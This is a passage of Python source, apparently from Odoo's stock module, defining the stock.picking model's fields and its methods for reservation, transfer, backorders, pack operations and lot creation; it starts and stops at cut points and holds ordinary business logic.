store={'stock.move': (_get_pickings_dates_priority, ['priority', 'picking_id'], 20)}, states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, select=1, help="Priority for this picking. Setting manually a value here would set it as priority for all the moves",
track_visibility='onchange', required=True),
'min_date': fields.function(get_min_max_date, multi="min_max_date", fnct_inv=_set_min_date,
store={'stock.move': (_get_pickings_dates_priority, ['date_expected', 'picking_id'], 20)}, type='datetime', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, string='Scheduled Date', select=1, help="Scheduled time for the first part of the shipment to be processed. Setting manually a value here would set it as expected date for all the stock moves.", track_visibility='onchange'),
'max_date': fields.function(get_min_max_date, multi="min_max_date",
store={'stock.move': (_get_pickings_dates_priority, ['date_expected', 'picking_id'], 20)}, type='datetime', string='Max. Expected Date', select=2, help="Scheduled time for the last part of the shipment to be processed"),
'date': fields.datetime('Creation Date', help="Creation Date, usually the time of the order", select=True, states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, track_visibility='onchange'),
'date_done': fields.datetime('Date of Transfer', help="Completion Date of Transfer", readonly=True, copy=False),
'quant_reserved_exist': fields.function(_get_quant_reserved_exist, type='boolean', string='Has quants already reserved', help='Check the existance of quants linked to this picking'),
'partner_id': fields.many2one('res.partner', 'Partner', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}),
'company_id': fields.many2one('res.company', 'Company', required=True, select=True, states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}),
'pack_operation_ids': fields.one2many('stock.pack.operation', 'picking_id', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, string='Related Packing Operations'),
'pack_operation_product_ids': fields.one2many('stock.pack.operation', 'picking_id', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, domain=[('product_id', '!=', False)], string='Non pack'),
'pack_operation_pack_ids': fields.one2many('stock.pack.operation', 'picking_id', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, domain=[('product_id', '=', False)], string='Pack'),
# technical field for attrs in view
'pack_operation_exist': fields.function(_get_pack_operation_exist, type='boolean', string='Has Pack Operations', help='Check the existance of pack operation on the picking'),
'owner_id': fields.many2one('res.partner', 'Owner', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, help="Default Owner"),
'printed': fields.boolean('Printed'),
# Used to search on pickings
'product_id': fields.related('move_lines', 'product_id', type='many2one', relation='product.product', string='Product'),
'recompute_pack_op': fields.boolean('Recompute pack operation?', help='True if reserved quants changed, which mean we might need to recompute the package operations', copy=False),
'group_id': fields.related('move_lines', 'group_id', type='many2one', relation='procurement.group', string='Procurement Group', readonly=True,
store={
'stock.picking': (lambda self, cr, uid, ids, ctx: ids, ['move_lines'], 10),
'stock.move': (_get_pickings, ['group_id', 'picking_id'], 10),
}),
'launch_pack_operations': fields.boolean("Launch Pack Operations", copy=False),
}
_defaults = {
'name': '/',
'state': 'draft',
'move_type': 'direct',
'printed': False,
'priority': '1', # normal
'date': fields.datetime.now,
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.picking', context=c),
'recompute_pack_op': False,
'launch_pack_operations': False,
}
_sql_constraints = [
('name_uniq', 'unique(name, company_id)', 'Reference must be unique per company!'),
]
def do_print_picking(self, cr, uid, ids, context=None):
'''This function prints the picking list'''
context = dict(context or {}, active_ids=ids)
self.write(cr, uid, ids, {'printed': True}, context=context)
return self.pool.get("report").get_action(cr, uid, ids, 'stock.report_picking', context=context)
def launch_packops(self, cr, uid, ids, context=None):
self.write(cr, uid, ids, {'launch_pack_operations': True}, context=context)
def action_confirm(self, cr, uid, ids, context=None):
todo = []
todo_force_assign = []
for picking in self.browse(cr, uid, ids, context=context):
if not picking.move_lines:
self.launch_packops(cr, uid, [picking.id], context=context)
if picking.location_id.usage in ('supplier', 'inventory', 'production'):
todo_force_assign.append(picking.id)
for r in picking.move_lines:
if r.state == 'draft':
todo.append(r.id)
if len(todo):
self.pool.get('stock.move').action_confirm(cr, uid, todo, context=context)
if todo_force_assign:
self.force_assign(cr, uid, todo_force_assign, context=context)
return True
def action_assign(self, cr, uid, ids, context=None):
""" Check availability of picking moves.
This has the effect of changing the state and reserve quants on available moves, and may
also impact the state of the picking as it is computed based on move's states.
@return: True
"""
for pick in self.browse(cr, uid, ids, context=context):
if pick.state == 'draft':
self.action_confirm(cr, uid, [pick.id], context=context)
#skip the moves that don't need to be checked
move_ids = [x.id for x in pick.move_lines if x.state not in ('draft', 'cancel', 'done')]
if not move_ids:
raise UserError(_('Nothing to check the availability for.'))
self.pool.get('stock.move').action_assign(cr, uid, move_ids, context=context)
return True
def force_assign(self, cr, uid, ids, context=None):
""" Changes state of picking to available if moves are confirmed or waiting.
@return: True
"""
pickings = self.browse(cr, uid, ids, context=context)
for pick in pickings:
move_ids = [x.id for x in pick.move_lines if x.state in ['confirmed', 'waiting']]
self.pool.get('stock.move').force_assign(cr, uid, move_ids, context=context)
return True
def action_cancel(self, cr, uid, ids, context=None):
for pick in self.browse(cr, uid, ids, context=context):
ids2 = [move.id for move in pick.move_lines]
self.pool.get('stock.move').action_cancel(cr, uid, ids2, context)
return True
def action_done(self, cr, uid, ids, context=None):
"""Changes picking state to done by processing the Stock Moves of the Picking
Normally that happens when the button "Done" is pressed on a Picking view.
@return: True
"""
for pick in self.browse(cr, uid, ids, context=context):
todo = []
for move in pick.move_lines:
if move.state == 'draft':
todo.extend(self.pool.get('stock.move').action_confirm(cr, uid, [move.id], context=context))
elif move.state in ('assigned', 'confirmed'):
todo.append(move.id)
if len(todo):
self.pool.get('stock.move').action_done(cr, uid, todo, context=context)
return True
def unlink(self, cr, uid, ids, context=None):
#on picking deletion, cancel its move then unlink them too
move_obj = self.pool.get('stock.move')
context = context or {}
for pick in self.browse(cr, uid, ids, context=context):
move_ids = [move.id for move in pick.move_lines]
move_obj.action_cancel(cr, uid, move_ids, context=context)
move_obj.unlink(cr, uid, move_ids, context=context)
return super(stock_picking, self).unlink(cr, uid, ids, context=context)
def _create_backorder(self, cr, uid, picking, backorder_moves=[], context=None):
""" Move all non-done lines into a new backorder picking. If the key 'do_only_split' is given in the context, then move all lines not in context.get('split', []) instead of all non-done lines.
"""
if not backorder_moves:
backorder_moves = picking.move_lines
backorder_move_ids = [x.id for x in backorder_moves if x.state not in ('done', 'cancel')]
if 'do_only_split' in context and context['do_only_split']:
backorder_move_ids = [x.id for x in backorder_moves if x.id not in context.get('split', [])]
if backorder_move_ids:
backorder_id = self.copy(cr, uid, picking.id, {
'name': '/',
'move_lines': [],
'pack_operation_ids': [],
'backorder_id': picking.id,
})
backorder = self.browse(cr, uid, backorder_id, context=context)
self.message_post(cr, uid, picking.id, body=_("Back order <em>%s</em> <b>created</b>.") % (backorder.name), context=context)
move_obj = self.pool.get("stock.move")
move_obj.write(cr, uid, backorder_move_ids, {'picking_id': backorder_id}, context=context)
if not picking.date_done:
self.write(cr, uid, [picking.id], {'date_done': time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)}, context=context)
self.action_confirm(cr, uid, [backorder_id], context=context)
self.action_assign(cr, uid, [backorder_id], context=context)
return backorder_id
return False
@api.cr_uid_ids_context
def recheck_availability(self, cr, uid, picking_ids, context=None):
self.action_assign(cr, uid, picking_ids, context=context)
self.do_prepare_partial(cr, uid, picking_ids, context=context)
def _get_top_level_packages(self, cr, uid, quants_suggested_locations, context=None):
"""This method searches for the higher level packages that can be moved as a single operation, given a list of quants
to move and their suggested destination, and returns the list of matching packages.
"""
# Try to find as much as possible top-level packages that can be moved
pack_obj = self.pool.get("stock.quant.package")
quant_obj = self.pool.get("stock.quant")
top_lvl_packages = set()
quants_to_compare = quants_suggested_locations.keys()
for pack in list(set([x.package_id for x in quants_suggested_locations.keys() if x and x.package_id])):
loop = True
test_pack = pack
good_pack = False
pack_destination = False
while loop:
pack_quants = pack_obj.get_content(cr, uid, [test_pack.id], context=context)
all_in = True
for quant in quant_obj.browse(cr, uid, pack_quants, context=context):
# If the quant is not in the quants to compare and not in the common location
if not quant in quants_to_compare:
all_in = False
break
else:
#if putaway strat apply, the destination location of each quant may be different (and thus the package should not be taken as a single operation)
if not pack_destination:
pack_destination = quants_suggested_locations[quant]
elif pack_destination != quants_suggested_locations[quant]:
all_in = False
break
if all_in:
good_pack = test_pack
if test_pack.parent_id:
test_pack = test_pack.parent_id
else:
#stop the loop when there's no parent package anymore
loop = False
else:
#stop the loop when the package test_pack is not totally reserved for moves of this picking
#(some quants may be reserved for other picking or not reserved at all)
loop = False
if good_pack:
top_lvl_packages.add(good_pack)
return list(top_lvl_packages)
def _prepare_pack_ops(self, cr, uid, picking, quants, forced_qties, context=None):
""" returns a list of dict, ready to be used in create() of stock.pack.operation.
:param picking: browse record (stock.picking)
:param quants: browse record list (stock.quant). List of quants associated to the picking
:param forced_qties: dictionary showing for each product (keys) its corresponding quantity (value) that is not covered by the quants associated to the picking
"""
def _picking_putaway_apply(product):
location = False
# Search putaway strategy
if product_putaway_strats.get(product.id):
location = product_putaway_strats[product.id]
else:
location = self.pool.get('stock.location').get_putaway_strategy(cr, uid, picking.location_dest_id, product, context=context)
product_putaway_strats[product.id] = location
return location or picking.location_dest_id.id
# If we encounter an UoM that is smaller than the default UoM or the one already chosen, use the new one instead.
product_uom = {} # Determines UoM used in pack operations
location_dest_id = None
location_id = None
for move in [x for x in picking.move_lines if x.state not in ('done', 'cancel')]:
if not product_uom.get(move.product_id.id):
product_uom[move.product_id.id] = move.product_id.uom_id
if move.product_uom.id != move.product_id.uom_id.id and move.product_uom.factor > product_uom[move.product_id.id].factor:
product_uom[move.product_id.id] = move.product_uom
if not move.scrapped:
if location_dest_id and move.location_dest_id.id != location_dest_id:
raise UserError(_('The destination location must be the same for all the moves of the picking.'))
location_dest_id = move.location_dest_id.id
if location_id and move.location_id.id != location_id:
raise UserError(_('The source location must be the same for all the moves of the picking.'))
location_id = move.location_id.id
pack_obj = self.pool.get("stock.quant.package")
quant_obj = self.pool.get("stock.quant")
vals = []
qtys_grouped = {}
lots_grouped = {}
#for each quant of the picking, find the suggested location
quants_suggested_locations = {}
product_putaway_strats = {}
for quant in quants:
if quant.qty <= 0:
continue
suggested_location_id = _picking_putaway_apply(quant.product_id)
quants_suggested_locations[quant] = suggested_location_id
#find the packages we can movei as a whole
top_lvl_packages = self._get_top_level_packages(cr, uid, quants_suggested_locations, context=context)
# and then create pack operations for the top-level packages found
for pack in top_lvl_packages:
pack_quant_ids = pack_obj.get_content(cr, uid, [pack.id], context=context)
pack_quants = quant_obj.browse(cr, uid, pack_quant_ids, context=context)
vals.append({
'picking_id': picking.id,
'package_id': pack.id,
'product_qty': 1.0,
'location_id': pack.location_id.id,
'location_dest_id': quants_suggested_locations[pack_quants[0]],
'owner_id': pack.owner_id.id,
})
#remove the quants inside the package so that they are excluded from the rest of the computation
for quant in pack_quants:
del quants_suggested_locations[quant]
# Go through all remaining reserved quants and group by product, package, owner, source location and dest location
# Lots will go into pack operation lot object
for quant, dest_location_id in quants_suggested_locations.items():
key = (quant.product_id.id, quant.package_id.id, quant.owner_id.id, quant.location_id.id, dest_location_id)
if qtys_grouped.get(key):
qtys_grouped[key] += quant.qty
else:
qtys_grouped[key] = quant.qty
if quant.product_id.tracking != 'none' and quant.lot_id:
lots_grouped.setdefault(key, {}).setdefault(quant.lot_id.id, 0.0)
lots_grouped[key][quant.lot_id.id] += quant.qty
# Do the same for the forced quantities (in cases of force_assign or incomming shipment for example)
for product, qty in forced_qties.items():
if qty <= 0:
continue
suggested_location_id = _picking_putaway_apply(product)
key = (product.id, False, picking.owner_id.id, picking.location_id.id, suggested_location_id)
if qtys_grouped.get(key):
qtys_grouped[key] += qty
else:
qtys_grouped[key] = qty
# Create the necessary operations for the grouped quants and remaining qtys
uom_obj = self.pool.get('product.uom')
prevals = {}
for key, qty in qtys_grouped.items():
product = self.pool.get("product.product").browse(cr, uid, key[0], context=context)
uom_id = product.uom_id.id
qty_uom = qty
if product_uom.get(key[0]):
uom_id = product_uom[key[0]].id
qty_uom = uom_obj._compute_qty(cr, uid, product.uom_id.id, qty, uom_id)
pack_lot_ids = []
if lots_grouped.get(key):
for lot in lots_grouped[key].keys():
pack_lot_ids += [(0, 0, {'lot_id': lot, 'qty': 0.0, 'qty_todo': lots_grouped[key][lot]})]
val_dict = {
'picking_id': picking.id,
'product_qty': qty_uom,
'product_id': key[0],
'package_id': key[1],
'owner_id': key[2],
'location_id': key[3],
'location_dest_id': key[4],
'product_uom_id': uom_id,
'pack_lot_ids': pack_lot_ids,
}
if key[0] in prevals:
prevals[key[0]].append(val_dict)
else:
prevals[key[0]] = [val_dict]
# prevals var holds the operations in order to create them in the same order than the picking stock moves if possible
processed_products = set()
for move in [x for x in picking.move_lines if x.state not in ('done', 'cancel')]:
if move.product_id.id not in processed_products:
vals += prevals.get(move.product_id.id, [])
processed_products.add(move.product_id.id)
return vals
@api.cr_uid_ids_context
def do_prepare_partial(self, cr, uid, picking_ids, context=None):
context = context or {}
pack_operation_obj = self.pool.get('stock.pack.operation')
#get list of existing operations and delete them
existing_package_ids = pack_operation_obj.search(cr, uid, [('picking_id', 'in', picking_ids)], context=context)
if existing_package_ids:
pack_operation_obj.unlink(cr, uid, existing_package_ids, context)
for picking in self.browse(cr, uid, picking_ids, context=context):
forced_qties = {} # Quantity remaining after calculating reserved quants
picking_quants = []
#Calculate packages, reserved quants, qtys of this picking's moves
for move in picking.move_lines:
if move.state not in ('assigned', 'confirmed', 'waiting'):
continue
move_quants = move.reserved_quant_ids
picking_quants += move_quants
forced_qty = (move.state == 'assigned') and move.product_qty - sum([x.qty for x in move_quants]) or 0
#if we used force_assign() on the move, or if the move is incoming, forced_qty > 0
if float_compare(forced_qty, 0, precision_rounding=move.product_id.uom_id.rounding) > 0:
if forced_qties.get(move.product_id):
forced_qties[move.product_id] += forced_qty
else:
forced_qties[move.product_id] = forced_qty
for vals in self._prepare_pack_ops(cr, uid, picking, picking_quants, forced_qties, context=context):
vals['fresh_record'] = False
pack_operation_obj.create(cr, uid, vals, context=context)
#recompute the remaining quantities all at once
self.do_recompute_remaining_quantities(cr, uid, picking_ids, context=context)
self.write(cr, uid, picking_ids, {'recompute_pack_op': False}, context=context)
@api.cr_uid_ids_context
def do_unreserve(self, cr, uid, picking_ids, context=None):
"""
Will remove all quants for picking in picking_ids
"""
moves_to_unreserve = []
pack_line_to_unreserve = []
for picking in self.browse(cr, uid, picking_ids, context=context):
moves_to_unreserve += [m.id for m in picking.move_lines if m.state not in ('done', 'cancel')]
pack_line_to_unreserve += [p.id for p in picking.pack_operation_ids]
if moves_to_unreserve:
if pack_line_to_unreserve:
self.pool.get('stock.pack.operation').unlink(cr, uid, pack_line_to_unreserve, context=context)
self.pool.get('stock.move').do_unreserve(cr, uid, moves_to_unreserve, context=context)
def recompute_remaining_qty(self, cr, uid, picking, done_qtys=False, context=None):
def _create_link_for_index(operation_id, index, product_id, qty_to_assign, quant_id=False):
move_dict = prod2move_ids[product_id][index]
qty_on_link = min(move_dict['remaining_qty'], qty_to_assign)
self.pool.get('stock.move.operation.link').create(cr, uid, {'move_id': move_dict['move'].id, 'operation_id': operation_id, 'qty': qty_on_link, 'reserved_quant_id': quant_id}, context=context)
if move_dict['remaining_qty'] == qty_on_link:
prod2move_ids[product_id].pop(index)
else:
move_dict['remaining_qty'] -= qty_on_link
return qty_on_link
def _create_link_for_quant(operation_id, quant, qty):
"""create a link for given operation and reserved move of given quant, for the max quantity possible, and returns this quantity"""
if not quant.reservation_id.id:
return _create_link_for_product(operation_id, quant.product_id.id, qty)
qty_on_link = 0
for i in range(0, len(prod2move_ids[quant.product_id.id])):
if prod2move_ids[quant.product_id.id][i]['move'].id != quant.reservation_id.id:
continue
qty_on_link = _create_link_for_index(operation_id, i, quant.product_id.id, qty, quant_id=quant.id)
break
return qty_on_link
def _create_link_for_product(operation_id, product_id, qty):
'''method that creates the link between a given operation and move(s) of given product, for the given quantity.
Returns True if it was possible to create links for the requested quantity (False if there was not enough quantity on stock moves)'''
qty_to_assign = qty
prod_obj = self.pool.get("product.product")
product = prod_obj.browse(cr, uid, product_id)
rounding = product.uom_id.rounding
qtyassign_cmp = float_compare(qty_to_assign, 0.0, precision_rounding=rounding)
if prod2move_ids.get(product_id):
while prod2move_ids[product_id] and qtyassign_cmp > 0:
qty_on_link = _create_link_for_index(operation_id, 0, product_id, qty_to_assign, quant_id=False)
qty_to_assign -= qty_on_link
qtyassign_cmp = float_compare(qty_to_assign, 0.0, precision_rounding=rounding)
return qtyassign_cmp == 0
uom_obj = self.pool.get('product.uom')
package_obj = self.pool.get('stock.quant.package')
quant_obj = self.pool.get('stock.quant')
link_obj = self.pool.get('stock.move.operation.link')
quants_in_package_done = set()
prod2move_ids = {}
still_to_do = []
#make a dictionary giving for each product, the moves and related quantity that can be used in operation links
moves = sorted([x for x in picking.move_lines if x.state not in ('done', 'cancel')], key=lambda x: (((x.state == 'assigned') and -2 or 0) + (x.partially_available and -1 or 0)))
for move in moves:
if not prod2move_ids.get(move.product_id.id):
prod2move_ids[move.product_id.id] = [{'move': move, 'remaining_qty': move.product_qty}]
else:
prod2move_ids[move.product_id.id].append({'move': move, 'remaining_qty': move.product_qty})
need_rereserve = False
#sort the operations in order to give higher priority to those with a package, then a serial number
operations = picking.pack_operation_ids
operations = sorted(operations, key=lambda x: ((x.package_id and not x.product_id) and -4 or 0) + (x.package_id and -2 or 0) + (x.pack_lot_ids and -1 or 0))
#delete existing operations to start again from scratch
links = link_obj.search(cr, uid, [('operation_id', 'in', [x.id for x in operations])], context=context)
if links:
link_obj.unlink(cr, uid, links, context=context)
#1) first, try to create links when quants can be identified without any doubt
for ops in operations:
lot_qty = {}
for packlot in ops.pack_lot_ids:
lot_qty[packlot.lot_id.id] = uom_obj._compute_qty(cr, uid, ops.product_uom_id.id, packlot.qty, ops.product_id.uom_id.id)
#for each operation, create the links with the stock move by seeking on the matching reserved quants,
#and deffer the operation if there is some ambiguity on the move to select
if ops.package_id and not ops.product_id and (not done_qtys or ops.qty_done):
#entire package
quant_ids = package_obj.get_content(cr, uid, [ops.package_id.id], context=context)
for quant in quant_obj.browse(cr, uid, quant_ids, context=context):
remaining_qty_on_quant = quant.qty
if quant.reservation_id:
#avoid quants being counted twice
quants_in_package_done.add(quant.id)
qty_on_link = _create_link_for_quant(ops.id, quant, quant.qty)
remaining_qty_on_quant -= qty_on_link
if remaining_qty_on_quant:
still_to_do.append((ops, quant.product_id.id, remaining_qty_on_quant))
need_rereserve = True
elif ops.product_id.id:
#Check moves with same product
product_qty = ops.qty_done if done_qtys else ops.product_qty
qty_to_assign = uom_obj._compute_qty_obj(cr, uid, ops.product_uom_id, product_qty, ops.product_id.uom_id, context=context)
precision_rounding = ops.product_id.uom_id.rounding
for move_dict in prod2move_ids.get(ops.product_id.id, []):
move = move_dict['move']
for quant in move.reserved_quant_ids:
if float_compare(qty_to_assign, 0, precision_rounding=precision_rounding) != 1:
break
if quant.id in quants_in_package_done:
continue
#check if the quant is matching the operation details
if ops.package_id:
flag = quant.package_id == ops.package_id
else:
flag = not quant.package_id.id
flag = flag and (ops.owner_id.id == quant.owner_id.id)
if flag:
if not lot_qty:
max_qty_on_link = min(quant.qty, qty_to_assign)
qty_on_link = _create_link_for_quant(ops.id, quant, max_qty_on_link)
qty_to_assign -= qty_on_link
else:
if lot_qty.get(quant.lot_id.id): #if there is still some qty left
max_qty_on_link = min(quant.qty, qty_to_assign, lot_qty[quant.lot_id.id])
qty_on_link = _create_link_for_quant(ops.id, quant, max_qty_on_link)
qty_to_assign -= qty_on_link
lot_qty[quant.lot_id.id] -= qty_on_link
qty_assign_cmp = float_compare(qty_to_assign, 0, precision_rounding=precision_rounding)
if qty_assign_cmp > 0:
#qty reserved is less than qty put in operations. We need to create a link but it's deferred after we processed
#all the quants (because they leave no choice on their related move and needs to be processed with higher priority)
still_to_do += [(ops, ops.product_id.id, qty_to_assign)]
need_rereserve = True
#2) then, process the remaining part
all_op_processed = True
for ops, product_id, remaining_qty in still_to_do:
all_op_processed = _create_link_for_product(ops.id, product_id, remaining_qty) and all_op_processed
return (need_rereserve, all_op_processed)
def picking_recompute_remaining_quantities(self, cr, uid, picking, done_qtys=False, context=None):
need_rereserve = False
all_op_processed = True
if picking.pack_operation_ids:
need_rereserve, all_op_processed = self.recompute_remaining_qty(cr, uid, picking, done_qtys=done_qtys, context=context)
return need_rereserve, all_op_processed
@api.cr_uid_ids_context
def do_recompute_remaining_quantities(self, cr, uid, picking_ids, done_qtys=False, context=None):
for picking in self.browse(cr, uid, picking_ids, context=context):
if picking.pack_operation_ids:
self.recompute_remaining_qty(cr, uid, picking, done_qtys=done_qtys, context=context)
def _prepare_values_extra_move(self, cr, uid, op, product, remaining_qty, context=None):
"""
Creates an extra move when there is no corresponding original move to be copied
"""
uom_obj = self.pool.get("product.uom")
uom_id = product.uom_id.id
qty = remaining_qty
if op.product_id and op.product_uom_id and op.product_uom_id.id != product.uom_id.id:
if op.product_uom_id.factor > product.uom_id.factor: #If the pack operation's is a smaller unit
uom_id = op.product_uom_id.id
#HALF-UP rounding as only rounding errors will be because of propagation of error from default UoM
qty = uom_obj._compute_qty_obj(cr, uid, product.uom_id, remaining_qty, op.product_uom_id, rounding_method='HALF-UP')
picking = op.picking_id
ref = product.default_code
name = '[' + ref + ']' + ' ' + product.name if ref else product.name
proc_id = False
for m in op.linked_move_operation_ids:
if m.move_id.procurement_id:
proc_id = m.move_id.procurement_id.id
break
res = {
'picking_id': picking.id,
'location_id': picking.location_id.id,
'location_dest_id': picking.location_dest_id.id,
'product_id': product.id,
'procurement_id': proc_id,
'product_uom': uom_id,
'product_uom_qty': qty,
'name': _('Extra Move: ') + name,
'state': 'draft',
'restrict_partner_id': op.owner_id.id,
'group_id': picking.group_id.id,
}
return res
def _create_extra_moves(self, cr, uid, picking, context=None):
'''This function creates move lines on a picking, at the time of do_transfer, based on
unexpected product transfers (or exceeding quantities) found in the pack operations.
'''
move_obj = self.pool.get('stock.move')
operation_obj = self.pool.get('stock.pack.operation')
moves = []
for op in picking.pack_operation_ids:
for product, remaining_qty in operation_obj._get_remaining_prod_quantities(cr, uid, op, context=context).items():
if float_compare(remaining_qty, 0, precision_rounding=product.uom_id.rounding) > 0:
vals = self._prepare_values_extra_move(cr, uid, op, product, remaining_qty, context=context)
moves.append(move_obj.create(cr, uid, vals, context=context))
if moves:
move_obj.action_confirm(cr, uid, moves, context=context)
return moves
def rereserve_pick(self, cr, uid, ids, context=None):
"""
This can be used to provide a button that rereserves taking into account the existing pack operations
"""
for pick in self.browse(cr, uid, ids, context=context):
self.rereserve_quants(cr, uid, pick, move_ids = [x.id for x in pick.move_lines
if x.state not in ('done', 'cancel')], context=context)
def rereserve_quants(self, cr, uid, picking, move_ids=[], context=None):
""" Unreserve quants then try to reassign quants."""
if context is None:
context = {}
stock_move_obj = self.pool.get('stock.move')
if not move_ids:
self.do_unreserve(cr, uid, [picking.id], context=context)
self.action_assign(cr, uid, [picking.id], context=context)
else:
if 'no_state_change' in context:
move = stock_move_obj.browse(cr, uid, move_ids, context=context)
stock_move_obj.do_unreserve(cr, uid, [m.id for m in move if m.reserved_quant_ids], context=context)
else:
stock_move_obj.do_unreserve(cr, uid, move_ids, context=context)
stock_move_obj.action_assign(cr, uid, move_ids, no_prepare=True, context=context)
def do_new_transfer(self, cr, uid, ids, context=None):
pack_op_obj = self.pool['stock.pack.operation']
data_obj = self.pool['ir.model.data']
for pick in self.browse(cr, uid, ids, context=context):
to_delete = []
if not pick.move_lines and not pick.pack_operation_ids:
raise UserError(_('Please create some Initial Demand or Mark as Todo and create some Operations. '))
# In draft or with no pack operations edited yet, ask if we can just do everything
if pick.state == 'draft' or all([x.qty_done == 0.0 for x in pick.pack_operation_ids]):
# If no lots when needed, raise error
picking_type = pick.picking_type_id
if (picking_type.use_create_lots or picking_type.use_existing_lots):
for pack in pick.pack_operation_ids:
if pack.product_id and pack.product_id.tracking != 'none':
raise UserError(_('Some products require lots, so you need to specify those first!'))
view = data_obj.xmlid_to_res_id(cr, uid, 'stock.view_immediate_transfer')
wiz_id = self.pool['stock.immediate.transfer'].create(cr, uid, {'pick_id': pick.id}, context=context)
return {
'name': _('Immediate Transfer?'),
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'stock.immediate.transfer',
'views': [(view, 'form')],
'view_id': view,
'target': 'new',
'res_id': wiz_id,
'context': context,
}
# Check backorder should check for other barcodes
if self.check_backorder(cr, uid, pick, context=context):
view = data_obj.xmlid_to_res_id(cr, uid, 'stock.view_backorder_confirmation')
wiz_id = self.pool['stock.backorder.confirmation'].create(cr, uid, {'pick_id': pick.id}, context=context)
return {
'name': _('Create Backorder?'),
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'stock.backorder.confirmation',
'views': [(view, 'form')],
'view_id': view,
'target': 'new',
'res_id': wiz_id,
'context': context,
}
for operation in pick.pack_operation_ids:
if operation.qty_done < 0:
raise UserError(_('No negative quantities allowed'))
if operation.qty_done > 0:
pack_op_obj.write(cr, uid, operation.id, {'product_qty': operation.qty_done}, context=context)
else:
to_delete.append(operation.id)
if to_delete:
pack_op_obj.unlink(cr, uid, to_delete, context=context)
self.do_transfer(cr, uid, ids, context=context)
return
def check_backorder(self, cr, uid, picking, context=None):
need_rereserve, all_op_processed = self.picking_recompute_remaining_quantities(cr, uid, picking, done_qtys=True, context=context)
for move in picking.move_lines:
if float_compare(move.remaining_qty, 0, precision_rounding = move.product_id.uom_id.rounding) != 0:
return True
return False
def create_lots_for_picking(self, cr, uid, ids, context=None):
lot_obj = self.pool['stock.production.lot']
opslot_obj = self.pool['stock.pack.operation.lot']
to_unlink = []
for picking in self.browse(cr, uid, ids, context=context):
for ops in picking.pack_operation_ids:
for opslot in ops.pack_lot_ids:
if not opslot.lot_id:
lot_id = lot_obj.create(cr, uid, {'name': opslot.lot_name, 'product_id': ops.product_id.id}, context=context)
opslot_obj.write(cr, uid, [opslot.id], {'lot_id':lot_id}, context=context)
#Unlink pack operations where qty = 0
to_unlink += [x.id for x in ops.pack_lot_ids if x.qty == 0.0]
opslot_obj.unlink(cr, uid, to_unlink, context=context)
def do_transfer(self, cr, uid, ids, context=None):
"""
If no pack operation, we do simple action_done of the picking
Otherwise, do the pack operations
"""
if not context:
context = {}
notrack_context = dict(context, mail_notrack=True)
stock_move_obj = self.pool.get('stock.move')
self.create_lots_for_picking(cr, uid, ids, context=context)
for picking in self.browse(cr, uid, ids, context=context):
if not picking.pack_operation_ids:
self.action_done(cr, uid, [picking.id], context=context)
continue
else:
need_rereserve, all_op_processed = self.picking_recompute_remaining_quantities(cr, uid, picking, context=context)
#create extra moves in the picking (unexpected product moves coming from pack operations)
todo_move_ids = []
if not all_op_processed:
todo_move_ids += self._create_extra_moves(cr, uid, picking, context=context)
if need_rereserve or not all_op_processed:
moves_reassign = any(x.origin_returned_move_id or x.move_orig_ids for x in picking.move_lines if x.state not in ['done', 'cancel'])
if moves_reassign and (picking.location_id.usage not in ("supplier", "production", "inventory")):
ctx = dict(context)
ctx['reserve_only_ops'] = True #unnecessary to assign other quants than those involved with pack operations as they will be unreserved anyways.
ctx['no_state_change'] = True
self.rereserve_quants(cr, uid, picking, move_ids=picking.move_lines.ids, context=ctx)
self.do_recompute_remaining_quantities(cr, uid, [picking.id], context=context)
#split move lines if needed
toassign_move_ids = []
for move in picking.move_lines:
remaining_qty = move.remaining_qty
if move.state in ('done', 'cancel'):
#ignore stock moves cancelled or already done
continue
elif move.state == 'draft':
toassign_move_ids.append(move.id)
if float_compare(remaining_qty, 0, precision_rounding = move.product_id.uom_id.rounding) == 0:
if move.state in ('draft', 'assigned', 'confirmed'):
todo_move_ids.append(move.id)
elif float_compare(remaining_qty,0, precision_rounding = move.product_id.uom_id.rounding) > 0 and \
float_compare(remaining_qty, move.product_qty, precision_rounding = move.product_id.uom_id.rounding) < 0:
new_move = stock_move_obj.split(cr, uid, move, remaining_qty, context=notrack_context)
todo_move_ids.append(move.id)
#Assign move as it was assigned before
toassign_move_ids.append(new_move)
todo_move_ids = list(set(todo_move_ids))
if todo_move_ids and not context.get('do_only_split'):
self.pool.get('stock.move').action_done(cr, uid, todo_move_ids, context=context)
elif context.get('do_only_split'):
context = dict(context, split=todo_move_ids)
self._create_backorder(cr, uid, picking, context=context)
return True
@api.cr_uid_ids_context
def do_split(self, cr, uid, picking_ids, context=None):
""" just split the picking (create a backorder) without making it 'done' """
if context is None:
context = {}
ctx = context.copy()
ctx['do_only_split'] = True
return self.do_transfer(cr, uid, picking_ids, context=ctx)
def put_in_pack(self, cr, uid, ids, context=None):
stock_move_obj = self.pool["stock.move"]
stock_operation_obj = self.pool["stock.pack.operation"]
package_obj = self.pool["stock.quant.package"]
package_id = False
for pick in self.browse(cr, uid, ids, context=context):
operations = [x for x in pick.pack_operation_ids if x.qty_done > 0 and (not x.result_package_id)]
pack_operation_ids = []
for operation in operations:
#If we haven't done all qty in operation, we have to split into 2 operation
op = operation
if operation.qty_done < operation.product_qty:
new_operation = stock_operation_obj.copy(cr, uid, operation.id, {'product_qty': operation.qty_done,'qty_done': operation.qty_done}, context=context)
stock_operation_obj.write(cr, uid, operation.id, {'product_qty': operation.product_qty - operation.qty_done,'qty_done': 0}, context=context)
if operation.pack_lot_ids:
packlots_transfer = [(4, x.id) for x in operation.pack_lot_ids]
stock_operation_obj.write(cr, uid, [new_operation], {'pack_lot_ids': packlots_transfer}, context=context)
# the stock.pack.operation.lot records now belong to the new, packaged stock.pack.operation
# we have to create new ones with new quantities for our original, unfinished stock.pack.operation
